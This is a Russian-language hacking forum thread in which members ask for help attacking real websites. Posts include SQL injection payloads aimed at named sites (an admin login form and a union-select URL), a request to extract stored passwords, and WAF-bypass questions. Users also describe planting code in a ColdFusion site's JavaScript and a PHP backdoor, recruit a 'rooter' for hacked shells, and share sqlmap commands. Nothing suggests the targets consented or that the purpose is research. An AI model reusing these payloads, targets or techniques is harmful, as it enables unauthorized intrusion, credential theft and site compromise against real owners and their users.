Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by +, 27 Apr 2015.

  1. FireRidlle

    FireRidlle New Member

    Joined:
    7 Jul 2009
    Messages:
    27
    Likes Received:
    4
    Reputations:
    3
    спасибо. таки да, есть второй запрос для пагинации
    Code:
    select count(*) as aggregate from `users` where `referrer_id` = ? and ( `email` like ? or `ip` like ? or concat_ws("", last_name, "", name, "midlle_name") like "%inject here%") and `users`.`deleted_at` is null order by  `id` desc limit 20 offset 0
    
    получается если он возвращает 0, то второй запрос (который писал в пред. посте) не выполняется. это вполне обьясняет вот это поведение


    есть варианты как можно обойти ситауцию когда иньекция попадает в два запроса с раным количеством колонок и все же воспользоватся union based


    или мб есть способ как в sql из колонок сделать строки
    Code:
     ") or id in(select ascii(substring(pass,1,1)),ascii(substring(pass,2,1)),ascii(substring(pass,3,1)) from users where id=xxxx) 
     
    #2841 FireRidlle, 20 May 2020
    Last edited: 20 May 2020
  2. crlf

    crlf Green member

    Joined:
    18 Mar 2016
    Messages:
    572
    Likes Received:
    1,100
    Reputations:
    374
    Есть как минимум два уязвимых запроса, а может быть три или больше, случай не простой, есть над чем подумать и развернуться. Стоит посмотреть в сторону фрагментированных инъекций или объединённых запросов, варианты есть и пока они не проверены, утверждать однозначно нельзя. В текущем состоянии дел, всё сильно зависит от окружения, контекста и соответсвенно выбранного вектора атаки. Думаю, что на этом моменте, не имеет смысла описывать абстракные техники, уже не целесообразно, нужно работать с конкретным случаем напрямую.
    Это что касается инъекции, но вполне возможно, что классическая схема SQLi => Admin => RCE, в данном случае будет куда предпочтительнее, чем просто видимая скуля.
     
    FireRidlle likes this.
  3. Octavian

    Octavian Elder - Старейшина

    Joined:
    8 Jul 2015
    Messages:
    480
    Likes Received:
    87
    Reputations:
    21
    [​IMG]
    SQLi в Oracle с подлючением все нормально
     
  4. WallHack

    WallHack Elder - Старейшина

    Joined:
    18 Jul 2013
    Messages:
    280
    Likes Received:
    119
    Reputations:
    27
    Есть возможность обойти?

    Code:
    $dir = './img/';
    $name = $dir . basename($_FILES['uploadfile']['name']);
     
    $ext = substr($_FILES['uploadfile']['name'],strpos($_FILES['uploadfile']['name'],'.'),strlen($_FILES['uploadfile']['name'])-1);
    $filetypes = array('.bmp','.jpg','.png','.jpeg','.gif','.BMP','.JPG','.PNG','.JPEG','.GIF');
    
    if(!in_array($ext,$filetypes)){
        echo "Данный формат файлов не поддерживается";
        }else{
        if (move_uploaded_file($_FILES['uploadfile']['tmp_name'], $name)) {
          echo "Изображение загружено";
        } else {
            echo "Ошибка";
        }
    }
     
  5. kacergei

    kacergei Member

    Joined:
    26 May 2007
    Messages:
    243
    Likes Received:
    87
    Reputations:
    1
    Здравствуйте, помогите пожалуйста извлечь пароли, никак не получается (пароли идут blob)
    Code:
    doma-pizza.ru/admin/login/
    поле login
    admin') AND EXTRACTVALUE(7257,CONCAT(0x5c,0x717a7a7871,(SELECT (ELT(7257=7257,1))),0x717a787671)) AND ('sIKG'='sIKG&password=admin&submit=%D0%92%D1%85%D0%BE%D0%B4
    
    back-end DBMS: MySQL >= 5.0.0
    banner: '5.7.21-20-beget-5.7.21-20-1-log'
    
    Таблица: PS_USER
    Колонки: PS_USER_LOGIN,PS_USER_PASSWORD
    
    Пробовал так как тут указывали, но ничего не вышло
    https://forum.antichat.ru/threads/431199/page-53#post-4390194
     
  6. CrispyChikHotty

    CrispyChikHotty New Member

    Joined:
    29 May 2020
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Всем привет. Нужен рутальщик для лома/шелов ссылок.
    Телеграм: @santa_moonride
     
  7. ms13

    ms13 Elder - Старейшина

    Joined:
    19 Jun 2015
    Messages:
    3,000
    Likes Received:
    15,692
    Reputations:
    116
    нормального рутальщика щас хрен где найдёшь! :(
     
  8. CrispyChikHotty

    CrispyChikHotty New Member

    Joined:
    29 May 2020
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Буду надеяться, что он сам меня найдёт : D
     
  9. pinch

    pinch Elder - Старейшина

    Joined:
    13 Dec 2009
    Messages:
    410
    Likes Received:
    46
    Reputations:
    40
    Не подскажите, есть сайт на ColdFusion 2018, два дня назад поставил свой код в js файл, проблема в том, что мой код то появляется, то его нету это со стороны обычного пользователя. Попытался 10 раз обновить страницу его нет, зашел на следующий день код есть. А если через шелл чекнуть то мой код постоянно в файле. Не понял истинную причину такого поведения. Вроде сайт на одном сервере, кэш сервера - прошло достаточно времени, кэш бразуера - я его постоянно чищу
     
  10. testvalue

    testvalue New Member

    Joined:
    30 May 2020
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Всем привет. Возник вопрос.

    Есть запрос вида
    Code:
    https://site/dynamic/pin/?pin=bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb&activate=1
    Получаю ошибку:

    Code:
    SQLSTATE[42000]: Syntax error or access violation: 3057 Incorrect user-level lock name 'WP_bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb'
    Гугление ошибки привело к тому, что возможно я имею дело с функцией GET_LOCK() в mysql. И возможен такой вектор:

    Code:
    (concat(version(),repeat(0x1,99)),0)
    Но к сожалению у меня не получается правильно составить запрос. Как отбросить префикс базы, который вываливается в ошибке и корректно составить запрос?

    Спасибо, буду признателен за помощь.
     
  11. pinch

    pinch Elder - Старейшина

    Joined:
    13 Dec 2009
    Messages:
    410
    Likes Received:
    46
    Reputations:
    40
    Вопрос все еще актуален, есть у кого-нибудь идеи?
     
  12. aberkroft

    aberkroft Member

    Joined:
    9 Feb 2020
    Messages:
    25
    Likes Received:
    12
    Reputations:
    3
    Сам сервер на бэке один ? Балансировка какого-нибудь нету ?
     
  13. pinch

    pinch Elder - Старейшина

    Joined:
    13 Dec 2009
    Messages:
    410
    Likes Received:
    46
    Reputations:
    40
    отписал в пм, также бэкдор который поставил на php файл (находится на соседней папке) нормально работает, а вот с js такие проблемы
     
  14. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    2,845
    Likes Received:
    400
    Reputations:
    230
    Опять ваф, помогите обойти, фильт union select
    Code:
    https://www.lfv.li/nationalmannschaften/u21-nationalmannschaft/mannschaft/detail/?tx_cfcleagueext_pi4%5BprofileId%5D=2057+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50+--+
     
  15. ringoz2221

    ringoz2221 New Member

    Joined:
    3 Jun 2020
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Нужна помощь

    В коде сайта есть код на привязку кошелька
    Работает он примерно так:

    Code:
    SELECT COUNT(*) FROM db_purse WHERE purse1='{$_GET["purse"]}'
    Если кошелёк не найден то выполняеться запрос

    Code:
    UPDATE db_purse SET purse1='{$_GET["purse"]}' WHERE user_id='$id'
    Но установить purse1 меня не устрайвает в таблице есть ещё purse2 и purse3, есть ли какаето возможность сформировать $_GET["purse"] таким образом чтобы подменить purse2 или purse3?
     
  16. aberkroft

    aberkroft Member

    Joined:
    9 Feb 2020
    Messages:
    25
    Likes Received:
    12
    Reputations:
    3
    Попробуй сначала составить ЖЕЛАЕМЫЙ запрос, который приведет к изменению значения поля, при этом не меняя исходный, а только дополняя его. После этого станет понятно, что модифицировать.
     
  17. troni900

    troni900 New Member

    Joined:
    10 Jun 2020
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Приветствую! Помогите правильно составить POST запрос для sqlmap
    Code:
    bronze=on&exclude-legends=on&formation=451&gold=on&leagues%5b%5d=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/&player-leagie-box=on&silver=on
     
  18. ringoz2221

    ringoz2221 New Member

    Joined:
    3 Jun 2020
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Я сильно в этом не шарю но всё что перепробывал мне не помогло
     
  19. karkajoi

    karkajoi Active Member

    Joined:
    26 Oct 2016
    Messages:
    398
    Likes Received:
    271
    Reputations:
    3
    Get
    Sqlmap.py --url "site.com/index.php?
    bronze=on&exclude-legends=on&formation=451&gold=on&leagues%5b%5d=*&player-leagie-box=on&silver=on" --dbs --risk=3 --level=3 --random-agent

    Post
    Sqlmap.py --url "site.com/index.php" --data="
    bronze=on&exclude-legends=on&formation=451&gold=on&leagues%5b%5d=*&player-leagie-box=on&silver=on" --dbs --risk=3 --level=3 --random-agent

    Суд по всему это выхлоп с акуши, так что я бы сильно не надеялся раскрутить,ещё к тому же слепую, дампится будет хрен пойми сколько, без шела никак
     
    Duble likes this.
  20. ms13

    ms13 Elder - Старейшина

    Joined:
    19 Jun 2015
    Messages:
    3,000
    Likes Received:
    15,692
    Reputations:
    116
    акуша)
     
Loading...